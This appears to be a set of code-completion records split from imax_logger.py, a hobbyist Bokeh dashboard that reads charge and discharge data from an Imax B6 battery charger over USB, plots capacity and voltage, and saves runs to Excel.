select_battype.on_change('value', select_battype_handler)
select_chrg_type = Select(title="Charge Type", value="Charge", options=["Charge", "Discharge", "Cycle", "Re-Peak", "AutoCharge", "Balance Charge", "Fast Charge", "Storage"])
def select_chrg_type_handler(attr, old, new):
settings['chrg_type'] = new
select_chrg_type.on_change('value', select_chrg_type_handler)
maxmah_slider = Slider(start=50, end=24000, value=1, step=50, title="Bat. Specified Capacity, mah")
def maxmah_handler(attr, old, new):
settings['nominal_mah'] = new
maxmah_slider.on_change('value', maxmah_handler)
DC_radio_group = RadioGroup(labels=["Discharge/Charge", "Charge/Discharge"], active=0)
def DC_radio_handler(new):
settings['DC'] = new
DC_radio_group.on_click(DC_radio_handler)
select_cells = Select(title = "No. of Cells", value ="4", options = [str(i) for i in range(1,13)])
def select_cells_handler(attr, old, new):
settings['cells'] = new
select_cells.on_change('value', select_cells_handler)
#imax discharge/charge # of cycles; imax limit is 5
#no way to read this from imax only shows up in set up packet
select_cycles = Select(title = "Cycles", value ="1", options = [str(i) for i in range(1,6)])
def select_cycles_handler(attr, old, new):
settings['cycles'] = new
select_cycles.on_change('value', select_cycles_handler)
text_input = TextInput(value="Enter run information", title="Run Info::")
def text_input_handler(attr, old, new):
settings['run_text'] = new
text_input.on_change("value", text_input_handler)
textsource = ColumnDataSource(data=dict(time = [],msg = []))
columns = [
TableColumn(field="time", title="Time"),
TableColumn(field="msg", title="Msg", width = 600)]
data_table = DataTable(source=textsource, columns=columns, width=600)
button_save = Button(label="Save Run", button_type = 'warning')
def button_save_handler():
global read_data
print('button save worked')
run_modes= {'bat_type':settings['bat_type'], 'chrg_type':settings['chrg_type'], 'nominal_mah':settings['nominal_mah'],
'DC_or_CD':settings['DC_or_CD'], 'cycles':settings['cycles'], 'cells':settings['cells'], 'run_text':settings['run_text']}
excel_out = imax_0.write_excel_file(run_modes, settings['final_read'], read_data, settings['settings_dict'])
msg = 'Data saved to: ' + excel_out
print(msg)
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
button_save.on_click(button_save_handler)
def text_update(t, msg):
global data_table
print('time and msg: ', t, msg)
new_data = dict(time=[t], msg=[msg],)
textsource.stream(new_data, 20) #adding the value is a scrolloff lines
data_table.update()
import imax_0
def check_device_status():
global device_dict
#used by startstop btn handler to determine if imax start btn was pressed, or imax running.
#global device_dict
EndPt_out = device_dict['EndPt_out']
EndPt_in = device_dict['EndPt_in']
device = device_dict['device']
#send host->imax packet to trigger imax to do imax->host transfer
#make sure device is still connected
if device:
w_out = device.write(EndPt_out, settings['data_out_packet'])
data = device.read(EndPt_in.bEndpointAddress,EndPt_in.wMaxPacketSize)
settings['run_status'] = int(str(data[4]))
return settings['run_status']
else:
print('Check device failed.')
return None
def get_final_data():
global device_dict
device = device_dict['device']
EndPt_out = device_dict['EndPt_out']
EndPt_in = device_dict['EndPt_in']
final_out = [0x0f, 0x03, 0xfe, 0x000, 0xfe, 0xff, 0xff] + [0]*57
w_out = device.write(EndPt_out, final_out)
final_data = device.read(EndPt_in.bEndpointAddress,EndPt_in.wMaxPacketSize)
if final_data:
final_mah = str(final_data[5] * 256 + final_data[6]) #energy
final_t = str(final_data[7] * 256 + final_data[8]) #timer sec
final_V = str((final_data[9] * 256 + final_data[10]) / 1000.0) #voltage, V
final_T = str(final_data[14]) #Temperature, deg C, if F???
#int temp
settings['final_read'] = {'final_mah':final_mah, 'final_t':final_t, 'final_V':final_V, 'final_T':final_T}
msg = 'Run completed. Final values: ' + final_mah + ' mah; '+ final_V + ' mV; ' + final_t + ' s.'
print(msg)
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
def start_device():
global read_data
global device_dict
#sets up device if connected, returns imax settings, configrs, and sets data dictionary.
#check for device, if not there wait for connection.
device_str = imax_0.find_my_device() #returns True if device found
if "No" in device_str:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), device_str)
print(device_str)
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax offline. Cycling for one minute.')
nowtime = datetime.datetime.now()
futuretime = datetime.datetime.now() + datetime.timedelta(minutes = 1)
while "No" in device_str:
|
print('device found')
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), device_str)
#device was found, engage device, get parameters and dictionaries
device_dict, read_data, settings_dict, data_out_packet = imax_0.start_imax()
print('Loading settings)
settings['settings_dict'] = settings_dict
settings['data_out_packet'] = data_out_packet
#Determine if device is idling, or already running: run_status = 2 or 3, or is running = 1
settings['run_status'] = check_device_status()
nowtime = datetime.datetime.now()
futuretime = datetime.datetime.now() + datetime.timedelta(minutes = 1)
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Waiting for Imax button press for one minute.')
while settings['run_status'] > 1:
settings['run_status'] = check_device_status()
if datetime.datetime.now()> futuretime:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax button not pressed in 1 min...aborting start.')
return False
time.sleep(1)
print('out of loop run_status is: ', settings['run_status'])
return True
def add_lines(plot, source, cells_num = 0):
#called from button_startstop_handler if bat_type LiPO, note cells must be > 1
color_list = ['orange', 'yellow', 'green', 'blue', 'violet', 'darkmagenta']
if cells_num > 1:
for i in range(cells_num):
p1.line(x = 'timer', y = 'cell'+ str(i+1), source = source, color = color_list[i], line_width = 2)
button_startstop = Button(label = "Start", button_type = 'success')
def button_startstop_handler():
global button_startstop
#read btn label and isas driver for condition
#label = "Start": and device_started = False is initial start up condition
if button_startstop.label == "Start":
button_startstop.label = "Connecting"
settings['device_started'] = start_device()
#returns True if device found,connected and started
if settings['device_started']:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax found & running.')
button_startstop.label = "Stop"
settings['start_cycle'] = curdoc().add_periodic_callback(update, 10000)
print('device found')
else:
if not settings['device_started']:
button_startstop.label = "Start"
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax start failed. Check everything')
else: #deal with stop conditions; user pressed app stop button, or run_status > 1 (imax buttons pressed.)
if button_startstop.label == "Stop":
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Run stopped.')
curdoc().remove_periodic_callback(settings['start_cycle'])
get_final_data()
button_startstop.label = "Start"
if "Li" in settings['bat_type']:
add_lines(p1, source, cells_num = int(settings['cells']))
button_startstop.on_click(button_startstop_handler)
def read_imax():
global read_data
global device_dict
# see above call to start_imax() for globals set from imax.py
#global data_out_packet
global out_data
#global run_status
device = device_dict['device']
EndPt_out = device_dict['EndPt_out']
EndPt_in = device_dict['EndPt_in']
#send the host->imax packet to trigger imax to fill buffer and do imax->host transfer
#make sure device is still connected
w_out = device.write(EndPt_out, settings['data_out_packet'])
try:
data = device.read(EndPt_in.bEndpointAddress,EndPt_in.wMaxPacketSize) #using more general form of Endpoint_IN attributes
except Exception as e:
print('Something went wrong: no data incoming; error is: ', e)
sys.exit()
#Parse the hex data
out_data['mah'] = [int(str(data[5]*256 + data[6]))] #capacity, mah
out_data['timer'] = [int(str(data[7]*256 + data[8]))] #seconds
out_data['volts'] = [int(str(data[9]*256 + data[10]))] #volts
out_data['current'] = [int(str(data[11]*256 + data[12]))] #amps
out_data['ext_T'] = [int(str(data[13]))]
out_data['internal_T'] = [int(str(data[14]))] #deg. C?
out_data['cell1'] = [int(str(data[17]*256 + data[18]))] #cell 1 etc.
out_data['cell2'] = [int(str(data[19]*256 + data[20]))]
out_data['cell3'] = [int(str(data[21]*256 + data[22]))]
out_data['cell4'] = [int(str(data[23]*256 + data[24]))]
out_data['cell5'] = [int(str(data[25]*256 + data[26]))]
out_data['cell6'] = [int(str(data[27]*256 + data[28]))]
read_data['mah'].append(int(str(data[5]*256 + data[6]))) #capacity, mah
read_data['timer'].append(int(str(data[7]*256 + data[8]))) #seconds
read_data['volts'].append(int(str(data[9]*256 + data[10]))) #volts
read_data['current'].append(int(str(data[11]*256 + data[12]))) #amps
read_data['ext_T'].append(int(str(data[13])))
read_data['internal_T'].append(int(str(data[14]))) #deg. C?
read_data['cell1'].append(int(str(data[17]*256 + data[18])))
read_data['cell2'].append(int(str(data[19]*256 + data[20])))
read_data['cell3'].append(int(str(data[21]*256 + data[22])))
read_data['cell4'].append(int(str(data[23]*256 + data[24])))
read_data['cell5'].append(int(str(data[25]*256 + data[26])))
read_data['cell6'].append(int(str(data[27]*256 + data[28])))
#print the data (same sequence Milek7 used with hidapi; much appreciated effort.
print(
str(data[4]) + ", " + #state
str(data[5] * 256 + data[6]) + ", " + #energy
str(data[7] * 256 + data[8]) + ", " + #timer
str((data[9] * 256 + data[10]) / 1000.0) + ", " + #voltage
str((data[11] * 256 + data[12]) / 1000.0) + ", " + #current
str(data[13]) + ", " + #ext temp
str(data[14]) + ", " + #int temp
str((data[17] * 256 + data[18]) / 1000.0) + ", " + #cell 1
str((data[19] * 256 + data[20]) / 1000.0) + ", " + #cels 2
str((data[21] * 256 + data[22]) / 1000.0) + ", " + #cell 3
str((data[23] * 256 + data[24]) / 1000.0) + ", " + #cell 4
str((data[25] * 256 + data[26]) / 1000.0) + ", " + #cell 5
str((data[27] * 256 + data[28]) / 1000.0) #cell 6
)
#Has the charger been stopped by pressing the charger Stop button?
settings['run_status'] = int(str(data[4]))
return settings['run_status'], out_data
#initialize read_data dictionary for plots
out_data = {'mah':[0], 'timer':[0], 'volts':[0], 'current':[0],
'ext_T':[0], 'internal_T':[0], 'cell1':[0], 'cell2':[0],
'cell3':[0],'cell4':[0], 'cell5':[0], 'cell6':[0]}
#time_interval = 5 #seconds
source = ColumnDataSource(data = out_data)
#Generate two plots, for capacity and voltage
p = figure(plot_width=400, plot_height=400)
p.title.text = "Capactiy Input vs. Charge Time"
p.title.text_color = "black"
p.title.text_font = "arial"
p.title.text_font_style = "bold"
p.yaxis.minor_tick_line_color = "black"
p.xaxis.axis_label = "Time, s"
p.yaxis.axis_label = "Capacity Added(mah)"
r_cap = p.line(x = 'timer', y = 'mah', source = source, color="red", line_width=2)
#Set the voltabe plot; complicated a bit by battery type
p1 = figure(plot_width=400, plot_height=400)
p1.title.text = "Voltage vs. Charge Time"
p1.title.text_color = "black"
p1.title.text_font = "arial"
p1.title.text_font_style = "bold"
p1.yaxis.minor_tick_line_color = "black"
p1.xaxis.axis_label = "Time, s"
p1.yaxis.axis_label = "Voltage. mV"
rx = p1.line(x = 'timer', y = 'volts', source = source, color = "firebrick", line_width=2)
"""
#test block for adding lines
if "Li" in bat_type:
r1 = p1.line(x ='timer', y = 'cell1', source = source, color="orange", line_width=2)
r2 = p1.line(x ='timer', y = 'cell2', source = source, color="yellow", line_width=2)
r3 = p1.line(x ='timer', y = 'cell3', source = source, color="green", line_width=2)
r4 = p1.line(x ='timer', y = 'cell4', source = source, color="blue", line_width=2)
r5 = p1.line(x ='timer', y = 'cell5', source = source, color="violet", line_width=2)
r6 = p1.line(x ='timer', y = 'cell6', source = source, color="darkmagenta", line_width=2)
"""
def update():
global out_data
global source
global device_dict
device = device_dict['device']
if device:
#note "new_data" is bokeh specific to only add to source
settings['run_status'], new_data = read_imax()
#print('read_imax returned run status: ', settings['run_status'])
if settings['run_status'] < 2 and button_startstop.label == "Stop":
source.stream(new_data) # 20)
else:
msg = '; User stopped run from imax stop button.'
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
button_startstop_handler()
else:
msg = '; Device no longer connected.'
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
button_startstop_handler()
"""
class Cycler(update()):
msg = "Message from Cycler"
start_cycle = staticmethod(curdoc().add_periodic_callback(update, 10000))
stop_cycle = staticmethod(curdoc().remove_periodic_callback(start_cycle))
# create the widgets
"""
#start_cycle = curdoc().add_periodic_callback(update, 10000) #time in milliseconds
#w1 = row(select_battype, select_chrg_type) #, width = 300) #sizing_mode = 'fixed')
w1 = widgetbox(select_battype, select_chrg_type, select_cells) #, width = 300) #sizing_mode = 'fixed')
w2 = widgetbox(maxmah_slider) #, sizing_mode='fixed')
w3 = widgetbox(text_input) #, sizing_mode = 'fixed')
w4 = widgetbox(button_startstop, button_save )#, sizing_mode ='fixed')
w5 = widgetbox(DC_radio_group, select_cycles)
w6 = widgetbox(data_table)
"""
Layit = layout([row(column(
[notice1],
[w1],
[w2],
[w3],
[w4],
[w5],
[data_table]),
column(p, p1))], sizing_mode='fixed')
"""
#Layit = gridplot([[column([p, p1]), widgetbox(w1.children+w2.children+w3.children+w4.children+w5.children)]])
curdoc().add_root(notice1)
Layit = gridplot([[widgetbox(w1.children+w2.children+w3.children+w4.children+w5.children,), column([p, p1])]])
curdoc().add_root(Layit)
curdoc().add_root(data_table)
#curdoc().add_root(p)
#curdoc().add_root(p1)
#interval is not constant,
#based on derivative of capacity
# Add a periodic callback to be run every 500 milliseconds
#curdoc().add_periodic_callback(update, 500)
#for running textarea update following is one way to do it with js
"""
textare udating w/ jquery and textarea
var txt = document.getElementById('log');
setInterval(function(){txt.value += '\ntest';},2000);
<textarea id='log' rows=50 cols=60 autofocus></textarea>
""" | device_str = imax_0.find_my_device() #returns msg which has "No" in it ,if device not found
if "No" in device_str:
if datetime.datetime.now()> futuretime:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Could not find device; check device and connection.')
return False
time.sleep(1) | conditional_block |
imax_logger.py | """
Bokah interface for Imax B6 mini charnger
Requires: bokeh - pip install bokuh
but calls imax_0.py; see imax_0.py for additional necessary library packages
"""
import sys
import time
import datetime
from bokeh.models import ColumnDataSource, Slider, DataTable, TableColumn
from bokeh.plotting import Figure, output_file, show
from bokeh.plotting import figure, output_file, show
from bokeh.io import output_file, show
from bokeh.layouts import widgetbox, column, row
from bokeh.models.widgets import Button, RadioButtonGroup, Select, Slider, RadioGroup, Div, TextInput
from bokeh.layouts import gridplot, layout
from bokeh.plotting import curdoc
from bokeh.driving import linear
from bokeh.models.callbacks import CustomJS
#specify varibles for the inputs.
bat_type = ""
chrg_type = ""
nominal_mah = 0
DC_or_CD = "Discharge/Charge"
cycles = 1
cells = 4
run_text = "Enter run information"
time_interval = 10 #seconds
final_read = {'final_mah':"", 'final_t':"", 'final_V':"", 'final_T':""}
#next is set in start_device(), which is obtained from imax_0.start_imax
device_dict = {'device':None, 'EndPt_out':None, 'EndPt_in':None}
text_update = None
settings_dict = {}
read_data = {}
data_out_packet = []
device_started = False
out_data = {}
start_cycle = None
run_status = 0
#create a dictionary of initial values to minimize global calls
settings = {
'bat_type':bat_type,
'cells':cells,
'chrg_type':chrg_type,
'nominal_mah':nominal_mah,
'DC_or_CD':DC_or_CD,
'cycles':cycles,
'device_started':device_started,
'time_interval':time_interval,
'start_cycle':start_cycle,
'run_text':run_text,
'run_status':run_status,
'final_out':final_read,
'data_out_packet':data_out_packet,
'settings_dict':settings_dict,
'device_dict':device_dict
}
#Create the header for page
notice1 = Div(text="""The data input here are for logging identification and saving conditions, which are already manually chosen
on the imax. They do not set or reset the imax.""",
sizing_mode = "scale_width")
select_battype = Select(title = "Battery Type", value ="", options = ['NiMH', 'NiCd', 'LiPO', 'LiFe', 'LiIO', 'LiHV'])
def select_battype_handler(attr, old, new):
settings['bat_type'] = new
select_battype.on_change('value', select_battype_handler)
select_chrg_type = Select(title="Charge Type", value="Charge", options=["Charge", "Discharge", "Cycle", "Re-Peak", "AutoCharge", "Balance Charge", "Fast Charge", "Storage"])
def select_chrg_type_handler(attr, old, new):
settings['chrg_type'] = new
select_chrg_type.on_change('value', select_chrg_type_handler)
maxmah_slider = Slider(start=50, end=24000, value=1, step=50, title="Bat. Specified Capacity, mah")
def maxmah_handler(attr, old, new):
settings['nominal_mah'] = new
maxmah_slider.on_change('value', maxmah_handler)
DC_radio_group = RadioGroup(labels=["Discharge/Charge", "Charge/Discharge"], active=0)
def DC_radio_handler(new):
|
DC_radio_group.on_click(DC_radio_handler)
select_cells = Select(title = "No. of Cells", value ="4", options = [str(i) for i in range(1,13)])
def select_cells_handler(attr, old, new):
settings['cells'] = new
select_cells.on_change('value', select_cells_handler)
#imax discharge/charge # of cycles; imax limit is 5
#no way to read this from imax only shows up in set up packet
select_cycles = Select(title = "Cycles", value ="1", options = [str(i) for i in range(1,6)])
def select_cycles_handler(attr, old, new):
settings['cycles'] = new
select_cycles.on_change('value', select_cycles_handler)
text_input = TextInput(value="Enter run information", title="Run Info::")
def text_input_handler(attr, old, new):
settings['run_text'] = new
text_input.on_change("value", text_input_handler)
textsource = ColumnDataSource(data=dict(time = [],msg = []))
columns = [
TableColumn(field="time", title="Time"),
TableColumn(field="msg", title="Msg", width = 600)]
data_table = DataTable(source=textsource, columns=columns, width=600)
button_save = Button(label="Save Run", button_type = 'warning')
def button_save_handler():
global read_data
print('button save worked')
run_modes= {'bat_type':settings['bat_type'], 'chrg_type':settings['chrg_type'], 'nominal_mah':settings['nominal_mah'],
'DC_or_CD':settings['DC_or_CD'], 'cycles':settings['cycles'], 'cells':settings['cells'], 'run_text':settings['run_text']}
excel_out = imax_0.write_excel_file(run_modes, settings['final_read'], read_data, settings['settings_dict'])
msg = 'Data saved to: ' + excel_out
print(msg)
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
button_save.on_click(button_save_handler)
def text_update(t, msg):
global data_table
print('time and msg: ', t, msg)
new_data = dict(time=[t], msg=[msg],)
textsource.stream(new_data, 20) #adding the value is a scrolloff lines
data_table.update()
import imax_0
def check_device_status():
global device_dict
#used by startstop btn handler to determine if imax start btn was pressed, or imax running.
#global device_dict
EndPt_out = device_dict['EndPt_out']
EndPt_in = device_dict['EndPt_in']
device = device_dict['device']
#send host->imax packet to trigger imax to do imax->host transfer
#make sure device is still connected
if device:
w_out = device.write(EndPt_out, settings['data_out_packet'])
data = device.read(EndPt_in.bEndpointAddress,EndPt_in.wMaxPacketSize)
settings['run_status'] = int(str(data[4]))
return settings['run_status']
else:
print('Check device failed.')
return None
def get_final_data():
global device_dict
device = device_dict['device']
EndPt_out = device_dict['EndPt_out']
EndPt_in = device_dict['EndPt_in']
final_out = [0x0f, 0x03, 0xfe, 0x000, 0xfe, 0xff, 0xff] + [0]*57
w_out = device.write(EndPt_out, final_out)
final_data = device.read(EndPt_in.bEndpointAddress,EndPt_in.wMaxPacketSize)
if final_data:
final_mah = str(final_data[5] * 256 + final_data[6]) #energy
final_t = str(final_data[7] * 256 + final_data[8]) #timer sec
final_V = str((final_data[9] * 256 + final_data[10]) / 1000.0) #voltage, V
final_T = str(final_data[14]) #Temperature, deg C, if F???
#int temp
settings['final_read'] = {'final_mah':final_mah, 'final_t':final_t, 'final_V':final_V, 'final_T':final_T}
msg = 'Run completed. Final values: ' + final_mah + ' mah; '+ final_V + ' mV; ' + final_t + ' s.'
print(msg)
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
def start_device():
global read_data
global device_dict
#sets up device if connected, returns imax settings, configrs, and sets data dictionary.
#check for device, if not there wait for connection.
device_str = imax_0.find_my_device() #returns True if device found
if "No" in device_str:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), device_str)
print(device_str)
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax offline. Cycling for one minute.')
nowtime = datetime.datetime.now()
futuretime = datetime.datetime.now() + datetime.timedelta(minutes = 1)
while "No" in device_str:
device_str = imax_0.find_my_device() #returns msg which has "No" in it ,if device not found
if "No" in device_str:
if datetime.datetime.now()> futuretime:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Could not find device; check device and connection.')
return False
time.sleep(1)
print('device found')
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), device_str)
#device was found, engage device, get parameters and dictionaries
device_dict, read_data, settings_dict, data_out_packet = imax_0.start_imax()
print('Loading settings)
settings['settings_dict'] = settings_dict
settings['data_out_packet'] = data_out_packet
#Determine if device is idling, or already running: run_status = 2 or 3, or is running = 1
settings['run_status'] = check_device_status()
nowtime = datetime.datetime.now()
futuretime = datetime.datetime.now() + datetime.timedelta(minutes = 1)
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Waiting for Imax button press for one minute.')
while settings['run_status'] > 1:
settings['run_status'] = check_device_status()
if datetime.datetime.now()> futuretime:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax button not pressed in 1 min...aborting start.')
return False
time.sleep(1)
print('out of loop run_status is: ', settings['run_status'])
return True
def add_lines(plot, source, cells_num = 0):
#called from button_startstop_handler if bat_type LiPO, note cells must be > 1
color_list = ['orange', 'yellow', 'green', 'blue', 'violet', 'darkmagenta']
if cells_num > 1:
for i in range(cells_num):
p1.line(x = 'timer', y = 'cell'+ str(i+1), source = source, color = color_list[i], line_width = 2)
button_startstop = Button(label = "Start", button_type = 'success')
def button_startstop_handler():
global button_startstop
#read btn label and isas driver for condition
#label = "Start": and device_started = False is initial start up condition
if button_startstop.label == "Start":
button_startstop.label = "Connecting"
settings['device_started'] = start_device()
#returns True if device found,connected and started
if settings['device_started']:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax found & running.')
button_startstop.label = "Stop"
settings['start_cycle'] = curdoc().add_periodic_callback(update, 10000)
print('device found')
else:
if not settings['device_started']:
button_startstop.label = "Start"
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax start failed. Check everything')
else: #deal with stop conditions; user pressed app stop button, or run_status > 1 (imax buttons pressed.)
if button_startstop.label == "Stop":
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Run stopped.')
curdoc().remove_periodic_callback(settings['start_cycle'])
get_final_data()
button_startstop.label = "Start"
if "Li" in settings['bat_type']:
add_lines(p1, source, cells_num = int(settings['cells']))
button_startstop.on_click(button_startstop_handler)
def read_imax():
global read_data
global device_dict
# see above call to start_imax() for globals set from imax.py
#global data_out_packet
global out_data
#global run_status
device = device_dict['device']
EndPt_out = device_dict['EndPt_out']
EndPt_in = device_dict['EndPt_in']
#send the host->imax packet to trigger imax to fill buffer and do imax->host transfer
#make sure device is still connected
w_out = device.write(EndPt_out, settings['data_out_packet'])
try:
data = device.read(EndPt_in.bEndpointAddress,EndPt_in.wMaxPacketSize) #using more general form of Endpoint_IN attributes
except Exception as e:
print('Something went wrong: no data incoming; error is: ', e)
sys.exit()
#Parse the hex data
out_data['mah'] = [int(str(data[5]*256 + data[6]))] #capacity, mah
out_data['timer'] = [int(str(data[7]*256 + data[8]))] #seconds
out_data['volts'] = [int(str(data[9]*256 + data[10]))] #volts
out_data['current'] = [int(str(data[11]*256 + data[12]))] #amps
out_data['ext_T'] = [int(str(data[13]))]
out_data['internal_T'] = [int(str(data[14]))] #deg. C?
out_data['cell1'] = [int(str(data[17]*256 + data[18]))] #cell 1 etc.
out_data['cell2'] = [int(str(data[19]*256 + data[20]))]
out_data['cell3'] = [int(str(data[21]*256 + data[22]))]
out_data['cell4'] = [int(str(data[23]*256 + data[24]))]
out_data['cell5'] = [int(str(data[25]*256 + data[26]))]
out_data['cell6'] = [int(str(data[27]*256 + data[28]))]
read_data['mah'].append(int(str(data[5]*256 + data[6]))) #capacity, mah
read_data['timer'].append(int(str(data[7]*256 + data[8]))) #seconds
read_data['volts'].append(int(str(data[9]*256 + data[10]))) #volts
read_data['current'].append(int(str(data[11]*256 + data[12]))) #amps
read_data['ext_T'].append(int(str(data[13])))
read_data['internal_T'].append(int(str(data[14]))) #deg. C?
read_data['cell1'].append(int(str(data[17]*256 + data[18])))
read_data['cell2'].append(int(str(data[19]*256 + data[20])))
read_data['cell3'].append(int(str(data[21]*256 + data[22])))
read_data['cell4'].append(int(str(data[23]*256 + data[24])))
read_data['cell5'].append(int(str(data[25]*256 + data[26])))
read_data['cell6'].append(int(str(data[27]*256 + data[28])))
#print the data (same sequence Milek7 used with hidapi; much appreciated effort.
print(
str(data[4]) + ", " + #state
str(data[5] * 256 + data[6]) + ", " + #energy
str(data[7] * 256 + data[8]) + ", " + #timer
str((data[9] * 256 + data[10]) / 1000.0) + ", " + #voltage
str((data[11] * 256 + data[12]) / 1000.0) + ", " + #current
str(data[13]) + ", " + #ext temp
str(data[14]) + ", " + #int temp
str((data[17] * 256 + data[18]) / 1000.0) + ", " + #cell 1
str((data[19] * 256 + data[20]) / 1000.0) + ", " + #cels 2
str((data[21] * 256 + data[22]) / 1000.0) + ", " + #cell 3
str((data[23] * 256 + data[24]) / 1000.0) + ", " + #cell 4
str((data[25] * 256 + data[26]) / 1000.0) + ", " + #cell 5
str((data[27] * 256 + data[28]) / 1000.0) #cell 6
)
#Has the charger been stopped by pressing the charger Stop button?
settings['run_status'] = int(str(data[4]))
return settings['run_status'], out_data
#initialize read_data dictionary for plots
out_data = {'mah':[0], 'timer':[0], 'volts':[0], 'current':[0],
'ext_T':[0], 'internal_T':[0], 'cell1':[0], 'cell2':[0],
'cell3':[0],'cell4':[0], 'cell5':[0], 'cell6':[0]}
#time_interval = 5 #seconds
source = ColumnDataSource(data = out_data)
#Generate two plots, for capacity and voltage
p = figure(plot_width=400, plot_height=400)
p.title.text = "Capactiy Input vs. Charge Time"
p.title.text_color = "black"
p.title.text_font = "arial"
p.title.text_font_style = "bold"
p.yaxis.minor_tick_line_color = "black"
p.xaxis.axis_label = "Time, s"
p.yaxis.axis_label = "Capacity Added(mah)"
r_cap = p.line(x = 'timer', y = 'mah', source = source, color="red", line_width=2)
#Set the voltabe plot; complicated a bit by battery type
p1 = figure(plot_width=400, plot_height=400)
p1.title.text = "Voltage vs. Charge Time"
p1.title.text_color = "black"
p1.title.text_font = "arial"
p1.title.text_font_style = "bold"
p1.yaxis.minor_tick_line_color = "black"
p1.xaxis.axis_label = "Time, s"
p1.yaxis.axis_label = "Voltage. mV"
rx = p1.line(x = 'timer', y = 'volts', source = source, color = "firebrick", line_width=2)
"""
#test block for adding lines
if "Li" in bat_type:
r1 = p1.line(x ='timer', y = 'cell1', source = source, color="orange", line_width=2)
r2 = p1.line(x ='timer', y = 'cell2', source = source, color="yellow", line_width=2)
r3 = p1.line(x ='timer', y = 'cell3', source = source, color="green", line_width=2)
r4 = p1.line(x ='timer', y = 'cell4', source = source, color="blue", line_width=2)
r5 = p1.line(x ='timer', y = 'cell5', source = source, color="violet", line_width=2)
r6 = p1.line(x ='timer', y = 'cell6', source = source, color="darkmagenta", line_width=2)
"""
def update():
global out_data
global source
global device_dict
device = device_dict['device']
if device:
#note "new_data" is bokeh specific to only add to source
settings['run_status'], new_data = read_imax()
#print('read_imax returned run status: ', settings['run_status'])
if settings['run_status'] < 2 and button_startstop.label == "Stop":
source.stream(new_data) # 20)
else:
msg = '; User stopped run from imax stop button.'
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
button_startstop_handler()
else:
msg = '; Device no longer connected.'
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
button_startstop_handler()
"""
class Cycler(update()):
msg = "Message from Cycler"
start_cycle = staticmethod(curdoc().add_periodic_callback(update, 10000))
stop_cycle = staticmethod(curdoc().remove_periodic_callback(start_cycle))
# create the widgets
"""
#start_cycle = curdoc().add_periodic_callback(update, 10000) #time in milliseconds
#w1 = row(select_battype, select_chrg_type) #, width = 300) #sizing_mode = 'fixed')
w1 = widgetbox(select_battype, select_chrg_type, select_cells) #, width = 300) #sizing_mode = 'fixed')
w2 = widgetbox(maxmah_slider) #, sizing_mode='fixed')
w3 = widgetbox(text_input) #, sizing_mode = 'fixed')
w4 = widgetbox(button_startstop, button_save )#, sizing_mode ='fixed')
w5 = widgetbox(DC_radio_group, select_cycles)
w6 = widgetbox(data_table)
"""
Layit = layout([row(column(
[notice1],
[w1],
[w2],
[w3],
[w4],
[w5],
[data_table]),
column(p, p1))], sizing_mode='fixed')
"""
#Layit = gridplot([[column([p, p1]), widgetbox(w1.children+w2.children+w3.children+w4.children+w5.children)]])
curdoc().add_root(notice1)
Layit = gridplot([[widgetbox(w1.children+w2.children+w3.children+w4.children+w5.children,), column([p, p1])]])
curdoc().add_root(Layit)
curdoc().add_root(data_table)
#curdoc().add_root(p)
#curdoc().add_root(p1)
#interval is not constant,
#based on derivative of capacity
# Add a periodic callback to be run every 500 milliseconds
#curdoc().add_periodic_callback(update, 500)
#for running textarea update following is one way to do it with js
"""
textare udating w/ jquery and textarea
var txt = document.getElementById('log');
setInterval(function(){txt.value += '\ntest';},2000);
<textarea id='log' rows=50 cols=60 autofocus></textarea>
""" | settings['DC'] = new | identifier_body |
imax_logger.py | """
Bokah interface for Imax B6 mini charnger
Requires: bokeh - pip install bokuh
but calls imax_0.py; see imax_0.py for additional necessary library packages
"""
import sys
import time
import datetime
from bokeh.models import ColumnDataSource, Slider, DataTable, TableColumn
from bokeh.plotting import Figure, output_file, show
from bokeh.plotting import figure, output_file, show
from bokeh.io import output_file, show
from bokeh.layouts import widgetbox, column, row
from bokeh.models.widgets import Button, RadioButtonGroup, Select, Slider, RadioGroup, Div, TextInput
from bokeh.layouts import gridplot, layout
from bokeh.plotting import curdoc
from bokeh.driving import linear
from bokeh.models.callbacks import CustomJS
#specify varibles for the inputs.
bat_type = ""
chrg_type = ""
nominal_mah = 0
DC_or_CD = "Discharge/Charge"
cycles = 1
cells = 4
run_text = "Enter run information"
time_interval = 10 #seconds
final_read = {'final_mah':"", 'final_t':"", 'final_V':"", 'final_T':""}
#next is set in start_device(), which is obtained from imax_0.start_imax
device_dict = {'device':None, 'EndPt_out':None, 'EndPt_in':None}
text_update = None
settings_dict = {}
read_data = {}
data_out_packet = []
device_started = False
out_data = {}
start_cycle = None
run_status = 0
#create a dictionary of initial values to minimize global calls
settings = {
'bat_type':bat_type,
'cells':cells,
'chrg_type':chrg_type,
'nominal_mah':nominal_mah,
'DC_or_CD':DC_or_CD,
